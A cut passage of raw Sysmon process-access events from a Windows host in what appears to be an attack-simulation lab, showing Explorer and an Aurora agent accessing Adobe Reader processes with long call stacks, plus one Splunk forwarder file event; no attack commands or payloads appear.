DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.452{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.452{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.452{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 23542300x800000000000000047080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.426{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1FCAEA85FACBDAE0965C4884024225BA,SHA256=5D429C1862131C4B773D1035C24D6C0BE01A25FA3CB6745DEE2450CD8D2CFDA1,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000047079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.409{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1010C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.409{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.409{FE4C2B44-DE08-63C7-F104-00000000AF02}60682980C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-E653-63C7-8E06-00000000AF02}7120C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\acrocef_1\RdrCEF.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013580F10) 10341000x800000000000000047076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.395{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\System32\ole32.dll+8a360|C:\Windows\System32\ole32.dll+8c3d3|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced|C:\Windows\system32\explorerframe.dll+1ac26|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+5888a 10341000x800000000000000047075Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.394{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047074Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.394{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047073Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.394{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047072Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.394{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047071Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.394{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047070Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.394{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047069Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.393{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1ea06|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047068Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.393{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+2c44d|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e95e|C:\Windows\SYSTEM32\twinapi.appcore.dll+1e3d1|C:\Windows\SYSTEM32\twinapi.appcore.dll+1b24a|C:\Windows\system32\dataexchange.dll+a087|C:\Windows\System32\ole32.dll+8c2e5|C:\Windows\System32\ole32.dll+8c93b|C:\Windows\System32\SHELL32.dll+2c8f3d|C:\Windows\System32\SHELL32.dll+283aae|C:\Windows\system32\explorerframe.dll+b29b9|C:\Windows\system32\DUI70.dll+48b9d|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\System32\DUser.dll+9f5a|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11d7b|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58770|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+4f50e|C:\Windows\system32\explorerframe.dll+4d2f6|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+587c9|C:\Windows\WinSxS\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.14393.4169_none_7de0bbf28341b1f2\comctl32.dll+58547|C:\Windows\system32\explorerframe.dll+1aced 10341000x800000000000000047067Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:30:11.393{FE4C2B44-DDF9-63C7-C404-00000000AF02}52006368C:\Windows\Explorer.EXE{FE4C2B44-E64B-63C7-8806-00000000AF02}5560C:\Program Files (x86)\Adobe\Acrobat Reader 